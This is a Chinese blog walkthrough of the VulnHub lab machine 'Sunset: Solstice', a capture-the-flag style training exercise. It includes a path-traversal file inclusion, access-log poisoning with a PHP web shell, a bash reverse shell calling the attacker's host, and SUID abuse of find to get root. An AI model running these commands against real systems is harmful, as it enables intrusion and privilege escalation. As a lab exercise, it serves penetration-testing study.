zoukankan      html  css  js  c++  java
  • PJzhang:vulnhub靶机sunset系列SUNSET:SOLSTICE

    猫宁~~~

    地址:https://www.vulnhub.com/entry/sunset-solstice,499/

    关注工具和思路。

    nmap 192.168.43.0/24

    靶机IP 192.168.43.127

    nmap -A -p1-65535 192.168.43.127

    21/tcp open ftp
    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    25/tcp open smtp Exim smtpd 4.92
    80/tcp open http Apache httpd 2.4.38 ((Debian))
    139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X
    445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian
    2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
    3128/tcp open squid-http Squid http proxy 4.6
    8593/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
    54787/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
    62524/tcp open ftp FreeFloat ftpd 1.00

    http://192.168.43.127/
    http://192.168.43.127:3128/
    http://192.168.43.127:8593/
    http://192.168.43.127:54787/

    dirb http://192.168.43.127/
    nikto -h http://192.168.43.127/

    发现文件包含漏洞
    http://192.168.43.127:8593/index.php?book=../../../../../../etc/passwd

    http://192.168.43.127:8593/index.php?book=../../../../../../var/log/apache2/access.log

    nc 192.168.43.127 80,回车输入GET /<?php system($_GET['cmd']); ?> HTTP/1.1
    或者GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1

    bash -c 'bash -i >& /dev/tcp/192.168.43.154/4444 0>&1'

    http://192.168.43.127:8593/index.php?book=../../../../../../var/log/apache2/access.log&cmd=bash -c 'bash -i >& /dev/tcp/192.168.43.154/4444 0>&1'

    攻击机nc -lvnp 4444

    获取shell
    python -c 'import pty;pty.spawn("/bin/bash")'
    www-data@solstice:/var/tmp/webserver$

    ps aux | grep root

    root 427 0.0 2.0 196744 21184 ? S 05:55 0:00 /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/

    cd /var/tmp/sv/

    printf "<?php system('chmod o+x /usr/bin/find; chmod +s /usr/bin/find'); ?>" >index.php

    curl 127.0.0.1:57/index.php

    find . -exec /bin/sh -p ; -quit

    whoami
    显示root
    id
    uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

  • 相关阅读:
    Java语言
    包名规范
    带参数的方法
    成员变量和局部变量
    Java数据类型
    java反射机制
    JDK安装
    注释
    二维数组
    数组的经典排序
  • 原文地址:https://www.cnblogs.com/landesk/p/13649003.html
Copyright © 2011-2022 走看看